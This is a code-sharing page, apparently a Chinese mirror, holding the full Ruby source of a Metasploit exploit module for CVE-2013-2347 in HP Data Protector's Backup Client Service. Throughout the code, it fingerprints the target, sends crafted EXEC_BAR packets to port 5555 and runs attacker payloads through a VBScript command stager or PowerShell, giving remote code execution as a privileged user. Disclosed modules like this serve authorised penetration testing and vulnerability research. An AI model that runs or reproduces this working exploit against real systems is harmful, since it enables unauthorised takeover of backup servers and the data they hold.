扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 |
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Powershell include Msf::Exploit::CmdStagerVBS def initialize(info = {}) super(update_info(info, 'Name' => 'HP Data Protector Backup Client Service Remote Code Execution', 'Description'=> %q{ This module abuses the Backup Client Service (OmniInet.exe) to achieve remote code execution. The vulnerability exists in the EXEC_BAR operation, which allows to execute arbitrary processes. This module has been tested successfully on HP Data Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2. }, 'Author' => [ 'Aniway.Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-2347' ], [ 'BID', '64647' ], [ 'ZDI', '14-008' ], [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422' ], [ 'URL', 'http://ddilabs.blogspot.com/2014/02/fun-with-hp-data-protector-execbar.html' ] ], 'Privileged' => true, 'Payload'=> { 'DisableNops' => true }, 'DefaultOptions'=> { 'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot") }, 'Platform'=> 'win', 'Targets' => [ [ 'HP Data Protector 6.20 build 370 / VBScript CMDStager', { } ], [ 'HP Data Protector 6.20 build 370 / Powershell', { } ] ], 'DefaultTarget'=> 0, 'DisclosureDate' => 'Jan 02 2014')) register_options( [ Opt::RPORT(5555), OptString.new('CMDPATH', [true, 'The cmd.exe path', 'c:\\windows\\system32\\cmd.exe']) ], self.class) end def check fingerprint = get_fingerprint if fingerprint.nil? return Exploit::CheckCode::Unknown end print_status("#{peer} - HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.06\.(\d+)/ minor = $1.to_i else return Exploit::CheckCode::Safe end if minor < 21 return Exploit::CheckCode::Appears elsif minor == 21 return Exploit::CheckCode::Detected else return Exploit::CheckCode::Detected end end def exploit if target.name =~ /VBScript CMDStager/ # 7500 just in case, to be sure the command fits after # environment variables expansion execute_cmdstager({:linemax => 7500}) elsif target.name =~ /Powershell/ # Environment variables are not being expanded before, neither in CreateProcess command = cmd_psh_payload(payload.encoded).gsub(/%COMSPEC% /, "") if command.length > 8000 # Windows 2008 Command Prompt Max Length is 8191 fail_with(Failure::BadConfig, "#{peer} - The selected paylod is too long to execute through powershell in one command") end print_status("#{peer} - Exploiting through Powershell...") exec_bar(datastore['CMDPATH'], command, "\x00") end end def peer "#{rhost}:#{rport}" end def build_pkt(fields) data = "\xff\xfe" # BOM Unicode fields.each do |v| data << "#{Rex::Text.to_unicode(v)}\x00\x00" data << Rex::Text.to_unicode(" ") # Separator end data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator return [data.length].pack("N") + data end def get_fingerprint ommni = connect ommni.put(rand_text_alpha_upper(64)) resp = ommni.get_once(-1) disconnect if resp.nil? return nil end Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null end def exec_bar(cmd, *args) connect pkt = build_pkt([ "2", # Message Type rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), "11", # Opcode EXEC_BAR rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), "#{cmd}", # Executable rand_text_alpha(8) ].concat(args)) sock.put(pkt) # In my testings the default timeout (10) isn't enough begin res = sock.get_once(-1, 20) rescue EOFError # happens when using the Powershell method disconnect return end fail_with(Failure::Unknown, "#{peer} - Expected answer not received... aborting...") unless exec_bar?(res) disconnect end def exec_bar?(data) return false if data.blank? data_unpacked = data.unpack("NnVv") data_unpacked.length == 4 && data_unpacked[0] == 8 && data_unpacked[1] == 0xfffe && data_unpacked[2] == 0x36 && data_unpacked[3] == 0 end def execute_command(cmd, opts = {}) exec_bar(datastore['CMDPATH'], "/c #{cmd}", "\x00") end def get_vbs_string(str) vbs_str = "" str.each_byte { |b| vbs_str << "Chr(#{b})+" } return vbs_str.chomp("+") end # Make the modifications required to the specific encoder # This exploit uses an specific encoder because quotes (") # aren't allowed when injecting commands def execute_cmdstager_begin(opts) var_decoded = @stager_instance.instance_variable_get(:@var_decoded) var_encoded = @stager_instance.instance_variable_get(:@var_encoded) decoded_file = "#{var_decoded}.exe" encoded_file = "#{var_encoded}.b64" @cmd_list.each do |command| # Because the exploit kills cscript processes to speed up and reliability command.gsub!(/cscript \/\/nologo/, "wscript //nologo") command.gsub!(/CHRENCFILE/, get_vbs_string(encoded_file)) command.gsub!(/CHRDECFILE/, get_vbs_string(decoded_file)) end end end |
体验盒子
